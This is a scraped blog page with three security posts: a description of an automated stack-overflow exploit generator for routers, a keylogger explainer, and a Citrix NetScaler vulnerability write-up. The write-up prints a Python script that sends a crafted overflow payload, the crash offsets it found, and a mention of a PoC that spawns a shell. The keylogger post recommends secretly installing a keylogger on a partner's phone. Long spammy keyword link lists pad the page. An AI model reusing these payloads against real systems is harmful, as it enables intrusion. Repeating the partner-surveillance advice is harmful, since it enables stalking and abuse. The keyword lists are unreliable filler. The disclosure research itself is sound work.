Router-Exploit-Shovel: An Automated Application Generator For Stack Overflow Types On Wireless Routers

segunda-feira, 31 de agosto de 2020

About Router-Exploit-Shovel
   Router-Exploit-Shovel is an automated application generation for Stack Overflow types on Wireless Routers.

   Router exploits shovel is an automated application generation tool for stack overflow types on wireless routers. The tool implements the key functions of exploits, it can adapt to the length of the data padding on the stack, generate the ROP chain, generate the encoded shellcode, and finally assemble them into a complete attack code. The user only needs to attach the attack code to the overflow location of the POC to complete the Exploit of the remote code execution.

   The tool supports MIPSel and MIPSeb.Run on Ubuntu 16.04 64bit.

Router-Exploit-Shovel's Installation
   Open your Terminal and enter these commands:
Usage


   Example: python3 Router_Exploit_Shovel.py -b test_binaries/mipseb-httpd -l test_binaries/libuClibc-0.9.30.so -o 0x00478584

Router-Exploit-Shovel's screenshot

Code structure

ROP chain generation
   This tool uses pattern to generate ROP chains. Extract patterns from common ROP exploitation procedure. Use regex matching to find available gadgets to fill up chain strings. Base64 encoding is to avoid duplicate character escapes. For example:

Attackblocks
   You can get attackblocks generated in results/attackBlocks.txt. Such as:

You might like these similar tools:

Related news


  1. Pentest Tools Alternative
  2. Hacker Tools For Mac
  3. Hacking Tools For Beginners
  4. Hacking Tools 2019
  5. Pentest Tools Windows
  6. Hacking Tools Kit
  7. Bluetooth Hacking Tools Kali
  8. Blackhat Hacker Tools
  9. How To Install Pentest Tools In Ubuntu
  10. Hack Tools Online
  11. Hack Apps
  12. Hack Tools
  13. Black Hat Hacker Tools
  14. Hack Tools Online
  15. How To Hack
  16. Pentest Tools List
  17. Hacker Techniques Tools And Incident Handling
  18. Android Hack Tools Github
  19. Pentest Tools Online
  20. Pentest Reporting Tools
  21. Hacker Search Tools
  22. Pentest Tools Apk
  23. Best Hacking Tools 2019
  24. Hacker Tools For Windows
  25. Hack Tools For Mac
  26. Hack And Tools
  27. Hacking Tools
  28. Pentest Recon Tools
  29. Hack Tools 2019
  30. Hacking Tools For Games
  31. Hacking Tools Kit
  32. Game Hacking
  33. Pentest Tools Nmap
  34. Hacking Tools Kit
  35. Wifi Hacker Tools For Windows
  36. Pentest Tools For Ubuntu
  37. Best Hacking Tools 2019
  38. Hack Tools For Ubuntu
  39. Hacker Tools Free
  40. Hack Tool Apk
  41. Hacker Tools
  42. Hacking Tools Pc
  43. Hacker Tools
  44. Top Pentest Tools
  45. Best Pentesting Tools 2018
  46. Pentest Automation Tools
  47. Hacking Tools Usb
  48. Pentest Tools For Android
  49. Hack App
  50. Hacker
  51. How To Hack
  52. Hacker Tools Software
  53. Hacking App
  54. Pentest Tools List
  55. Pentest Tools Port Scanner
  56. Pentest Box Tools Download
  57. Hack Tools Download
  58. Nsa Hack Tools Download
  59. Hack Tools Online
  60. Pentest Tools
  61. Pentest Tools Open Source
  62. Bluetooth Hacking Tools Kali
  63. Pentest Tools Nmap
  64. Hacker Tools Apk Download
  65. Hack Tools Download
  66. Hacker Tools For Ios
  67. Hacker Tools Mac
  68. Pentest Tools List
  69. Pentest Tools For Windows
  70. Hack Tools Github
  71. Hack Tool Apk No Root
  72. Hacking Tools Hardware
  73. New Hack Tools
  74. Hacking Tools 2020
  75. Hacker Tools Free
  76. Hacker Tool Kit
  77. Pentest Tools
  78. Easy Hack Tools
  79. Best Hacking Tools 2020
  80. Hacking Tools Mac
  81. Pentest Tools Github
  82. Pentest Tools List
  83. Hacking Tools Download
  84. Bluetooth Hacking Tools Kali
  85. Hacker Techniques Tools And Incident Handling
  86. Hack Tool Apk
  87. Pentest Tools Windows
  88. Pentest Tools Subdomain
  89. Hacking Tools Windows 10
  90. Black Hat Hacker Tools
  91. Hacker Tools Software
  92. Hack Tools Download
  93. Hacker Tool Kit
  94. How To Install Pentest Tools In Ubuntu
  95. Nsa Hack Tools Download
  96. Install Pentest Tools Ubuntu
  97. Pentest Tools Port Scanner
  98. Hacking Tools Pc
  99. Hacker Tools Linux
  100. Pentest Tools Nmap
  101. Hacker Hardware Tools
  102. How To Install Pentest Tools In Ubuntu
  103. Bluetooth Hacking Tools Kali
  104. Pentest Tools For Windows
  105. Hacker Tools Mac
  106. Hacker Tools List
  107. Hacking Apps
  108. Pentest Tools For Mac
  109. Physical Pentest Tools
  110. Pentest Tools Apk
  111. Wifi Hacker Tools For Windows
  112. Hack Tools 2019
  113. Hacker Tools 2020
  114. Hacking Tools Mac
  115. Hacker Tools For Pc
  116. Ethical Hacker Tools
  117. Pentest Tools Find Subdomains
  118. Pentest Tools Open Source
  119. Hack Tools For Ubuntu
  120. Hacker Tools For Windows
  121. Hacking Tools For Pc

What Is Keylogger? Uses Of Keylogger In Hacking ?

domingo, 30 de agosto de 2020


What is keylogger? 

How does hacker use keylogger to hack social media account and steal important data for money extortion and many uses of keylogger ?

Types of keylogger? 

===================

Keylogger is a tool that hacker use to monitor and record the keystroke you made on your keyboard. Keylogger is the action of recording the keys struck on a keyboard and it has capability to record every keystroke made on that system as well as monitor screen recording also. This is the oldest forms of malware.


Sometimes it is called a keystroke logger or system monitor is a type of surveillance technology used to monitor and record each keystroke type a specific computer's keyboard. It is also available for use on smartphones such as Apple,I-phone and Android devices.


A keylogger can record instant messages,email and capture any information you type at any time using your keyboard,including usernames password of your social media ac and personal identifying pin etc thats the reason some hacker use it to hack social media account for money extortion.

======================

Use of keylogger are as follows- 

1-Employers to observe employee's computer activity. 

2-Attacker / Hacker used for hacking some crucial data of any organisation for money extortion.

3-Parental Control is use to supervise their children's internet usage and check to control the browsing history of their child.

4-Criminals use keylogger to steal personal or financial information such as banking details credit card details etc and then which they will sell and earn a good profit. 

5-Spouse/Gf tracking-if you are facing this issue that your Spouse or Gf is cheating on you then you can install a keylogger on her cell phone to monitor her activities over the internet whatever you want such as check Whats app, facebook and cell phone texts messages etc . 

=====================

Basically there are two types of keylogger either the software or hardware but the most common types of keylogger across both these are as follows-

1-API based keylogger 

2-Form Grabbing Based Keylogger 

3-Kernal Based Keylogger 

4-Acoustic Keylogger ETC . 

====================

How to detect keylogger on a system?

An antikeylogger is a piece of software specially designed to detect it on a computer. 

Sometype of keylogger are easily detected and removed by the best antivirus software. 

You can view  the task manager(list of current programs) on a windows PC by Ctrl+Alt+Del to detect it.

Use of any software to perform any illegal activity is a crime, Do at your own risk.




Related articles
  1. New Hack Tools
  2. Game Hacking
  3. Nsa Hack Tools Download
  4. Ethical Hacker Tools
  5. Hack And Tools
  6. Hack And Tools
  7. Pentest Tools Online
  8. Hacking Tools Name
  9. Pentest Tools For Ubuntu
  10. Hacking Apps
  11. Hacking Tools For Mac
  12. Hack Website Online Tool
  13. Pentest Tools Framework
  14. Hack Tools Pc
  15. Black Hat Hacker Tools
  16. Hacking Tools And Software
  17. Hacker Tools For Ios
  18. Pentest Tools Android
  19. Pentest Tools Review
  20. Hacker Tools Mac
  21. Hacker Search Tools
  22. Hacking Apps
  23. Pentest Tools Review
  24. How To Make Hacking Tools
  25. Pentest Tools For Mac
  26. Pentest Recon Tools
  27. Pentest Recon Tools
  28. Pentest Tools For Windows
  29. Easy Hack Tools
  30. Kik Hack Tools
  31. Hacking Tools 2020
  32. Hackers Toolbox
  33. Nsa Hack Tools
  34. Hacker Techniques Tools And Incident Handling
  35. Best Pentesting Tools 2018
  36. Hacker Tools Software
  37. New Hack Tools
  38. Hacking Tools For Windows Free Download
  39. Underground Hacker Sites
  40. Pentest Tools Website
  41. Pentest Tools Website
  42. Beginner Hacker Tools
  43. Hacking Tools Github
  44. New Hacker Tools
  45. Usb Pentest Tools
  46. Pentest Tools For Android
  47. Hack Tools Online
  48. Nsa Hack Tools Download
  49. Hacking Apps
  50. Hacker Tools Software
  51. Hacking Tools For Beginners
  52. Pentest Tools Subdomain
  53. Hackrf Tools
  54. Pentest Tools For Mac
  55. Best Pentesting Tools 2018
  56. Hacking Tools Github
  57. Pentest Tools Github
  58. Hack Tools For Windows
  59. Hackers Toolbox
  60. Hacker Tools 2019
  61. Hacking Tools 2020
  62. Hacking Tools Usb
  63. Hacking Tools For Mac
  64. How To Install Pentest Tools In Ubuntu
  65. Hacking Tools 2019
  66. What Are Hacking Tools
  67. Hacking Tools Mac
  68. What Are Hacking Tools
  69. Hacking Tools Download
  70. Hacking Tools 2019
  71. Hack App
  72. Pentest Tools Nmap
  73. Hacking Tools Name
  74. Hacking Tools Software
  75. Hacker Tools 2019
  76. Pentest Automation Tools
  77. Android Hack Tools Github
  78. Hacker Tools For Mac
  79. Hacker Security Tools
  80. Pentest Tools Free
  81. Pentest Tools Open Source
  82. Hacking Tools Online
  83. Hacks And Tools
  84. Hacker Tools Software
  85. Hack Tools For Mac
  86. Pentest Tools Github
  87. Hack Apps
  88. Usb Pentest Tools
  89. Pentest Tools Apk
  90. Pentest Box Tools Download
  91. Pentest Tools Framework
  92. Hak5 Tools
  93. Hacker Tools Software
  94. Hacks And Tools
  95. Hacker Tools Apk
  96. How To Make Hacking Tools
  97. Install Pentest Tools Ubuntu
  98. Easy Hack Tools
  99. Hacking Tools Mac
  100. How To Install Pentest Tools In Ubuntu
  101. Nsa Hack Tools Download
  102. How To Hack
  103. Hacking Tools 2020
  104. Hacker Tools For Ios
  105. Hacking Tools For Pc
  106. Hacking Tools Download
  107. Hack Tools Pc
  108. Install Pentest Tools Ubuntu
  109. Pentest Tools Subdomain
  110. Hack Tool Apk
  111. Pentest Box Tools Download
  112. Nsa Hack Tools
  113. World No 1 Hacker Software
  114. Hacking Tools For Windows
  115. Tools For Hacker
  116. Pentest Tools For Mac
  117. Pentest Tools Android
  118. Hack Rom Tools
  119. Pentest Tools Website
  120. Hacking Tools Online
  121. Hacking Tools Name
  122. Black Hat Hacker Tools
  123. Hacker Techniques Tools And Incident Handling
  124. Tools 4 Hack
  125. Underground Hacker Sites
  126. Hacks And Tools
  127. Hacker Tools Apk Download
  128. How To Install Pentest Tools In Ubuntu
  129. Hacking App
  130. Hacker Tools Apk
  131. Hacking Tools Windows 10
  132. Hacking Tools For Pc
  133. Pentest Tools Alternative
  134. Nsa Hack Tools Download
  135. Pentest Automation Tools
  136. Hacker Tools List
  137. Android Hack Tools Github
  138. Hacking Tools For Windows
  139. Pentest Tools Windows
  140. Pentest Tools Find Subdomains
  141. Kik Hack Tools
  142. Ethical Hacker Tools
  143. Game Hacking

Scaling The NetScaler


A few months ago I noticed that Citrix provides virtual appliances to test their applications, I decided to pull down an appliance and take a peek. First I started out by downloading the trial Netscaler VM (version 10.1-119.7) from the following location:

http://www.citrix.com/products/netscaler-application-delivery-controller/try.html

Upon boot, the appliance is configured with nsroot/nsroot for the login and password. I logged in and started looking around and noticed that the web application is written in PHP using the code igniter framework (screw that crap). Since code igniter abstracts everything with MVC and actual scripts are hidden behind routes I decided to take a look at the apache configuration. I noticed that apache was configured with a SOAP endpoint that was using shared objects (YUMMY):

/etc/httpd 
# SOAP handler
<Location /soap>
SetHandler gsoap-handler SOAPLibrary /usr/lib/libnscli90.so SupportLibrary /usr/lib/libnsapps.so </Location>
It wasn't clear what this end point was used for and it wasn't friendly if you hit it directly:




So I grep'd through the application code looking for any calls to this service and got a hit:
root@ns# grep -r '/soap' *
models/common/xmlapi_model.php: $this->soap_client = new nusoap_client("http://" . $this->server_ip . "/soap");

Within this file I saw this juicy bit of PHP which would have made this whole process way easier if it wasn't neutered with the hardcoded "$use_api = true;"


/netscaler/ns_gui/admin_ui/php/application/models/common/xmlapi_model.php
protected function command_execution($command, $parameters, $use_api = true) {
//Reporting can use API & exe to execute commands. To make it work, comment the following line.
$use_api = true; if(!$use_api)
{
$exec_command = "/netscaler/nscollect " . $this- >convert_parameters_to_string($command, $parameters);
$this->benchmark->mark("ns_exe_start");
$exe_result = exec($exec_command); $this->benchmark->mark("ns_exe_end");
$elapsed_time = $this->benchmark->elapsed_time("ns_exe_start",
"ns_exe_end");
log_message("profile", $elapsed_time . " --> EXE_EXECUTION_TIME " .
$command); $this->result["rc"] = 0;
$this->result["message"] = "Done"; $this->result["List"] = array(array("response" => $exe_result));
$return_value = 0;
For giggles I set it to false and gave it a whirl, worked as expected :(

The other side of this "if" statement was a reference to making a soap call and due to the reference to the local "/soap" and the fact all roads from "do_login" were driven to this file through over nine thousand levels of abstraction it was clear that upon login the server made an internal request to this endpoint. I started up tcpdump on the loopback interface on the box and captured an example request:
root@ns# tcpdump -Ani lo0 -s0 port 80
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on lo0, link-type NULL (BSD loopback), capture size 65535 bytes 23:29:18.169188 IP 127.0.0.1.49731 > 127.0.0.1.80: P 1:863(862) ack 1 win 33304 <nop,nop,timestamp 1659543 1659542>
E...>D@.@............C.P'R...2.............
..R...R.POST /soap HTTP/1.0
Host: 127.0.0.1
User-Agent: NuSOAP/0.9.5 (1.56)
Content-Type: text/xml; charset=ISO-8859-1
SOAPAction: ""
Content-Length: 708
<?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP- ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP- ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP- ENC="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body> <ns7744:login xmlns:ns7744="urn:NSConfig"><username xsi:type="xsd:string">nsroot</username><password xsi:type="xsd:string">nsroot</password><clientip
xsi:type="xsd:string">192.168.166.1</clientip><cookieTimeout xsi:type="xsd:int">1800</cookieTimeout><ns xsi:type="xsd:string">192.168.166.138</ns></ns7744:login></SOAP-ENV:Body> </SOAP-ENV:Envelope>
23:29:18.174582 IP 127.0.0.1.80 > 127.0.0.1.49731: P 1:961(960) ack 863 win 33304 <nop,nop,timestamp 1659548 1659543>
E...>[@.@............P.C.2..'R.o.....\.....
..R...R.HTTP/1.1 200 OK
Date: Mon, 02 Jun 2014 23:29:18 GMT
Server: Apache
Last-Modified: Mon, 02 Jun 2014 23:29:18 GMT Status: 200 OK
Content-Length: 615
Connection: keep-alive, close
Set-Cookie: NSAPI=##7BD2646BC9BC8A2426ACD0A5D92AF3377A152EBFDA878F45DAAF34A43 09F;Domain=127.0.0.1;Path=/soap;Version=1
Content-Type: text/xml; charset=utf-8
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP- ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP- ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns="urn:NSConfig"> <SOAP-ENV:Header></SOAP-ENV:Header><SOAP-ENV:Body SOAP- ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <ns:loginResponse><return xsi:type="ns:simpleResult"><rc xsi:type="xsd:unsignedInt">0</rc><message xsi:type="xsd:string">Done</message> </return></ns:loginResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>
I pulled the request out and started playing with it in burp repeater. The one thing that seemed strange was that it had a parameter that was the IP of the box itself, the client string I got...it was used for tracking who was making requests to login, but the other didn't really make sense to me. I went ahead and changed the address to another VM and noticed something strange:





According to tcpdump it was trying to connect to my provided host on port 3010:
root@ns# tcpdump -A host 192.168.166.137 and port not ssh
tcpdump: WARNING: BIOCPROMISC: Device busy
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on 0/1, link-type EN10MB (Ethernet), capture size 96 bytes 23:37:17.040559 IP 192.168.166.138.49392 > 192.168.166.137.3010: S 4126875155:4126875155(0) win 65535 <mss 1460,nop,wscale 1,nop,nop,timestamp 2138392 0,sackOK,eol>

I fired up netcat to see what it was sending, but it was just "junk", so I grabbed a pcap on the loopback interface on the netscaler vm to catch a normal transaction between the SOAP endpoint and the service to see what it was doing. It still wasn't really clear exactly what the data was as it was some sort of "binary" stream:




I grabbed a copy of the servers response and setup a test python client that replied with a replay of the servers response, it worked (and there may be an auth bypass here as it responds with a cookie for some API functionality...). I figured it may be worth shooting a bunch of crap back at the client just to see what would happen. I modified my python script to insert a bunch "A" into the stream:
import socket,sys
resp = "\x00\x01\x00\x00\xa5\xa5"+ ("A"*1000)+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
HOST = None # Symbolic name meaning all available interfaces
PORT = 3010 # Arbitrary non-privileged port
s = None
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC,socket.SOCK_STREAM, 0, socket.AI_PASSIVE):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
except socket.error as msg:
s = None
continue
try:
s.bind(sa)
s.listen(1)
except socket.error as msg:
s.close()
s = None
continue
break
if s is None:
print 'could not open socket'
sys.exit(1)
conn, addr = s.accept()
print 'Connected by', addr
while 1:
data = conn.recv(1024)
if not data:
break
print 'sending!' conn.send(resp)
print 'sent!' conn.close()


Which provided the following awesome log entry in the Netscaler VM window:



Loading the dump up in gdb we get the following (promising looking):


And the current instruction it is trying to call:



An offset into the address 0x41414141, sure that usually works :P - we need to adjust the payload in a way that EDX is a valid address we can address by offset in order to continue execution. In order to do that we need to figure out where in our payload the EDX value is coming from. The metasploit "pattern_create" works great for this ("root@blah:/usr/share/metasploit-framework/tools# ./pattern_create.rb 1000"). After replacing the "A" *1000 in our script with the pattern we can see that EDX is at offset 610 in our payload:





Looking at the source of EDX, which is an offset of EBP we can see the rest of our payload, we can go ahead and replace the value in our payload at offset 610 with the address of EBP 
resp = "\x00\x01\x00\x00\xa5\xa5"+p[:610]+'\x78\xda\xff\xff'+p[614:]+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

When we run everything again and take a look at our core dump you can see we have progressed in execution and have hit another snag that causes a crash:


The crash was caused because once again the app is trying to access a value at an offset of a bad address (from our payload). This value is at offset 606 in our payload according to "pattern_offset" and if you were following along you can see that this value sits at 0xffffda78 + 4, which is what we specified previously. So we need to adjust our payload with another address to have EDX point at a valid address and keep playing whack a mole OR we can look at the function and possibly find a short cut:




If we can follow this code path keeping EDX a valid memory address and set EBP+12 (offset in our payload) to 0x0 we can take the jump LEAV/RET and for the sake of time and my sanity, unroll the call stack to the point of our control. You will have to trust me here OR download the VM and see for yourself (my suggestion if you have found this interesting :> )

And of course, the money shot:


A PoC can be found HERE that will spawn a shell on port 1337 of the NetScaler vm, hopefully someone has some fun with it :)

It is not clear if this issue has been fixed by Citrix as they stopped giving me updates on the status of this bug. For those that are concerned with the timeline:

6/3/14 - Bug was reported to Citrix
6/4/14 - Confirmation report was received
6/24/14 - Update from Citrix - In the process of scheduling updates
7/14/14 - Emailed asking for update
7/16/14 - Update from Citrix - Still scheduling update, will let me know the following week.
9/22/14 - No further communication received. Well past 100 days, public disclosure


Read more